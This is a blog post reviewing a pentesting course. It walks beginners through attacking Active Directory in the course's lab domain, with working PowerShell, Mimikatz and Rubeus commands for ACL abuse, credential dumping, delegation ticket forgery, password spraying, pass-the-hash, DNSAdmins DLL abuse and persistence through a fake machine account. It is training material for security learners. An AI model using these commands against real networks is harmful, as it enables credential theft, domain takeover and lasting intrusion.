Review & Sharing experience Active Directory (AD) Attack

Ploy Thanasornsawan
12 min readAug 2, 2020



First of all, This blog I use lab from CRTP in pentester academy to study and I will preview just some exploit from my understanding not full method.It is recommand for people without background AD attack but want to start as beginner.It use pure powershell exploit.No post exploitation framework because it really beginner.

In CRTP course provide both video walkthough and walkthough pdf and tools available on study lab.So, you not need to worry that you will not be able to solve lab but you have to dig deep into detail by yourself more than course provided.I wrote this blog because I want to show some method which not refer in CRTP course or detail much in walkthough to help you understand AD attack

Okays, from this picture it start from external recon and then compromise machine.You can try since start like this from ePTXv2 because it will teach external recon from kali machine scan all IP network find which port can try attack or find all users in company for do social engineering and then embeded macro into excel file and delivery via email outlook (Insider attack).You can read Social engineering solution on ePTXv2 from this blog.He may pretend to be some user in company and sent it to IT department that has rights to access all servers in company to open that macro file and then a attacker get shell to one server in company after IT guy click open that macro which is compromise machine.

But I do not recommend people to buy ePTXv2 if no background on AD attack. You can read review from someone here. ePTX is good course but not friendly for beginner.It is my personal experience because I bought both ePTXv2 and CRTP and feel like CRTP make me understand more from basic.

In CRTP, it assume you compromise server and start from internal recon that above picture and main focus on powershell command.

Internal Recon

  1. What role we are now? => whoami
  2. Which privilege group we are? => whoami /groups

For example:
1) Result show we are in group BUILTIN\Administrator

Picture from STEALTHBITS part Lateral movement

It means we can run command as local admin and recon creds of domain admin in next step (If our group show we are domain admin,it should show jefflab\administrators)

2) Result show we not part of local admin, we have to escalate our current user to be admin or have some privilege group relate to domain like dcorp\RDPUsers in domain

We can try enumerate with bloodhound to see what’s this group can do or rights to access any servers in current domain

That yellow symbol is RDPUsers group which after expand map,it shows all user and our user is part of RDPUsers group and RDPUsers group is admin to DCORP-ADMINSRV machine.I will talk about it later from this point.

3. Which users is local admin? => net localgroup administrators

When we know which user is local admin, we may try search password in description from this command

Find-UserField -SearchField Description -SearchTerm “built”

Or try abuse GPO to add current user to be local admin.You can read this technique from blog “gpo-abuse-and-you” which use tool name “metronome.cs” to edit GPO but this C# in github use with .Net version 3.5 but in CRTP lab can’t use .Net version 3.5.You can try create AD lab for pracitce by yourself.Except this has tool SharpGPOAbuse for find misconfiguration GPO on AD.

Guideline for people who not know how to complie .cs file to exe from github.You can download .Net from Microsoft website and use csc to complie C:\WINDOWS\Microsoft.NET\Framework\v[your version number]\csc.exe

About abuse ACL, recommend listen this youtube “Here Be Dragons The Unexplored Land of Active Directory ACLs”. They talk about how to add permission and delete permission command on ACL and iredteam blog and some tool like Invoke-ACLpwn (use with .Net 3.5) for privilege escalation and this blog of Nikhil teach about RACE toolkit use for abuse ACL

In case ACL, we may find SPN user or any useful account that can use for lateral movement to next machine by check that our current user has rights as GenericALL on that user or Generic Write for edit password without know current password and then use PSremoting with that credential

For example check ACL on RDPUsers group

Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReference -match “RDPUsers”}

We saw that ControlXUser has rights as GenericALL on AD.It means if we compromise this account.We can add rights ACL on AD to our current user too.Let’s try abuse by change password on ControlXUser.If current user has rights abuse ACL over this user,it will show password successful reset

Set-DomainUserPassword -Identity Control46User -Verbose

$pwd = ConvertTo-SecureString ‘Password1234’ -AsPlaintext -Force

$cred= New-Object System.Management.Automation.PSCredential (“Control46User”, $pwd)

Let’s try check this user can access any machine that can jump to AD

Invoke-UserHunter -UserName Control46User

For example this user can access dcorp_test and dcorp_test can jump to DC, we can use PSremoting with credential like this command

Enter-PSSession -ComputerName dcorp_test -Cred $cred

In case windows privilege escalation, you can use tool like PowerUP, Beroot, Privesc.ps1 and so on.I think this pdf will help guide you AD attack
You may found credential in registry or misconfiguration service to abuse or remote code execution from dll hijacking

Can we found user that password not expired and use bad password?

Command for check password not expired

get-aduser -filter * -properties Name, PasswordNeverExpires | where { $_.passwordNeverExpires -eq “true” } | where {$_.enabled -eq “true”}

Command for check bad password

Get-UserProperty -Properties badpwdcount

Command for check policy password


Create wordlist password that match policy and try password spray from crackmapexec.exe to check which password can use for login as admin user on our server. See tutorial from STEALTBITS here

4. What’s current domain name? => Get-NetDomain
Result will show both domain controller name and forest domain name

5. What’s domain controller name? => Get-NetDomainController

6. What’s domain admin of current domain? => Get-NetGroupMember -GroupName ‘Domain Admins’

7. What’s domain admin of forest domain (Enterprise admin)? => Get-NetGroupMember -GroupName ‘Enterprise Admins’ -Domain <forest domain name here>

Assume we are local admin now.Next step is lateral movement to be domain admin on current domain for find creds on DC to jump to forest domain and stay persistent on DC for back again and again to get infomation

Lateral movement to be Domain Admin

1. By jump to another machine that can go to Domain Controller

1.1 Local admin access (derivative admin)

We can use PowerView module to check our current user has local admin access to which machine on powershell command

Find-LocalAdminAccess -Verbose

Or use Powershell Empire module powerview to check local admin access

About use module in Powershell Empire is same style like metasploit, you just type info to see which parameter required True (Need to put value) and then execte for run module

You can learn more about powershell empire from here

It shows same result that current user can access dcorp-adminsrv machine.Let’s use BloodHound to check about this machine

We found that machine ‘DCORP-ADMINSRV’ contains APPLOCKED policy.We can try check policy APPLOCK on this machine by this command

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

Some interesting policy on AppLocker show allow all members of the Everyone Group to run scripts that are located in the Program Files or Windows Folder.It means we can load any script to that path on dcorp-adminsrv session and then we will can run malicious script inside machine

Copy-Item .\Invoke-MimikatzEx.ps1 \\dcorp-adminsrv.dollarcorp.moneycorp.local\c$\‘Program Files’

and after we enter into adminsrv remote session and execute script Invoke-Mimikatz, we will get all credential on this machine

1.2 check all live machines and port to get access that machine

Get-NetComputer -Ping

Check IP each machine by ping command

ping dcorp-ci.dollarcorp.moneycorp.local

Use Invoke-PortScan to check all range IP that we found from ping command

Invoke-PortScan -StartAddress -EndAddress -ScanPort

We may see some machine open port 80 and we get reverse shell to machine from that website

Caution: technique about jump from machine 1 to machine 2 for find any machine.Focus on dump hash credential of all users on new machine by Invoke-Mimikatz for pass-the-hash to domain controller or Invoke-userHunter -CheckAccess to Domain Controller or any machine that has credential to access Domain Controller from current machine

1.3 constrain delegation user

Step 1: Find constrain delegation user

. C:\AD\Tools\Powerview_dev.ps1
Get-DomainUser -TrustedToAuth

We will see that user websvc allow delegate to service:cifs/dcorp-mssql.dollarcorp.moneycorp.LOCAL (This technique may not show it really access to domain controller but in some case we may see constrain delegation user allow to delegate to share file service on domain controller)

In CRTP course, he teach with kekeo create ticket and use dir to check access to we have rights to read on that machine.From this step you can use PSExec.exe to access to that machine for run command

Or use Rubeus.exe to create ticket and then impersonate to be admin to gain access on machine with parameter altservice which kekeo not has

Step 2: Use Rubeus to create ticket to service constrained delegation

.\Rubeus.exe asktgt /user:websvc /domain:dollarcorp.moneycorp.local /rc4:<websvc ntlm hash value>

Step 3:Copy all base64 value and put into text file name websvc.txt and then pass all value in websvc.txt to parameter $b64

Step 4: Create file kirbi from base64 value

[IO.File]::WriteAllBytes(“c:\AD\Tools\temp\websvc_axis.kirbi”, [Convert]::FromBase64String($b64))

Step 5: use Rubeus pass the ticket to gain access to dcorp-mssql

.\Rubeus.exe s4u /domain:dollarcorp.moneycorp.local /impersonateuser:administrator /msdsspn: “cifs/dcorp-mssql.dollarcorp.moneycorp.LOCAL” /ticket:c:\AD\Tools\temp\websvc_axis.kirbi /altservice:http /ptt

Verify ticket was created successful

Gain access to dcorp-mssql

You can learn how to use kekeo from CRTP course but I just want to show Rubeus can do on this case too.

2. By privilege escaltion to be privilege user on Domain controller

2.1 Domain password Spray from this github

Import-Module .\DomainPasswordSpray.ps1

Step 1: find all user in domain save to file users.txt

Get-DomainUserList -Domain dollarcorp.moneycorp.local -RemoveDisabled -RemovePotentialLockouts | Out-File -Encoding ascii users.txt

Step 2: check domain password policy and create password list

Import-Module .\Microsoft.ActiveDirectory.Management.dll
Import-Module .\ActiveDirectory\ActiveDirectory.psd1

Step 3: Try domain password spray

Invoke-DomainPasswordSpray -UserList users.txt -Domain dollarcorp.moneycorp.local -PasswordList password.txt -OutFile sprayed-creds.txt

In case of password spray, you may got domain admin account or got any useful account that can use to access machine for dump credential of privilege user

After get plaintext password, we can use powershell remote with credential or use module DSInternals to reverse it to ntlm hash and use mimikatz for pth

Import-Module .\DSInternals.PowerShell
Import-Module .\DSInternals.Common.d
Import-Module .\DSInternals\DSInternals.psd1

$pwd = ConvertTo-SecureString ‘Password1234’ -AsPlaintext -Force
ConvertTo-NTHash $pwd

2.2 DNSadmin to Domain Admin

  • First we need to know who is DNSadmin

Get-NetGroupMember -GroupName “DNSAdmins”

  • Identify that now we are in group DNSAdmins by whoami /groups
  • If we are not a member of DNSAdmins, we have to find credential of this user by check from which machine current user and DNSadmin has access

Invoke-UserHunter -UserName srvadmin

  • and then pass the hash of user srvadmin on mimikatz

Invoke-Mimikatz -Command ‘“sekurlsa::pth /user:srvadmin /domain:dollarcorp.moneycorp.local /ntlm:<ntlm value>/run:powershell.exe”’

  • It required DNS server running and if you are administrator, you can open Server and manager and then add then click add ‘role and features’ DNSserver

Abuse configuartion on DNS name “serverlevelplugindll” to load malicious dll into DNS on domain controller and that dll file should be able to read by Everyone

You can continue read in detail from Nikhil blog, he talk about how to adjust dll code in kdns.c to be reverse powershell and another technique recommend to watch from ippsec video ‘resolute’, He teach about reverse shell on DNS server by adjust code on dns-exe-persistent to import function reverse powershell which is stable and not make DNS service fail like msfvenom and this medium blog describe why it is “serverlevelplugindll”


The reason why it need to do persistence because when attacker got into forest domain,They can back to steal data from server any time

It has many method that CRTP course refer in walkthough pdf but I will show one method that they not teach is Resource base constrained delegation (Abusing RBCD) by create fake machine in domain

Step 1: Check quota machine on domain

Get-ADObject ((Get-ADDomain).distinguishedname) -Properties ms-DS-MachineAccountQuota

It shows machine quota = 10

Step 2: Use module from powermad to create fake machine for join domain

import-module .\Powermad.ps1
New-MachineAccount -MachineAccount FAKE01 -Password $(ConvertTo-SecureString ‘123456’ -AsPlainText -Force) -Verbose

Step 3: Check SID of fake machine that we just created

Step 4: Use pth run Domain Admin powershell for try abuse RBCD on domain controller

Set-ADComputer DCORP-DC$ -PrincipalsAllowedToDelegateToAccount FAKE01$ -Verbose

Step 5: Verify that Domain Controller allow to delegate to fake machine

Get-ADComputer DCORP-DC$ -Properties ‘msds-allowedtoactonbehalfofotheridentity’

Get-ADComputer DCORP-DC$ -Properties PrincipalsAllowedToDelegateToAccount

Step 6: change password that we set to fake machine to ntlm hash

$pwd = (ConvertTo-SecureString ‘123456’ -AsPlainTex -Force)
ConvertTo-NTHash $pwd
# computer machine hash = 32ed87bdb5fdc5e9cba88547376818d4

Step 7: Gain access back to domain controller with ntlm hash of fake machine

Rubeus.exe s4u /domain:dollarcorp.moneycorp.local /user:FAKE01$ /rc4:32ed87bdb5fdc5e9cba88547376818d4 /impersonateuser:administrator /msdsspn:”cifs/dcorp-dc.dollarcorp.moneycorp.local” /ptt

Recommend learning platform for red teaming

CRTP -> CRTE -> PACES + offshore + rastalab/ ePTXv2 (optional) -> CRTO

HackTheBox machines that can try AD attack (Bloodhound, PowerView)


**Good blog sauna writeup for getting start Covernant here (you can read more about Covernant framework here)
**Good blog vault write up for learn socks4 proxy here

Tryhackme machines that you can try AD attack

Attacktive Directory
Post-Exploitation Basics
Active Directory Basics
Attacking Kerberos

Cyberseclabs machines that you can try AD attack


Useful resource:



Ploy Thanasornsawan
Ploy Thanasornsawan

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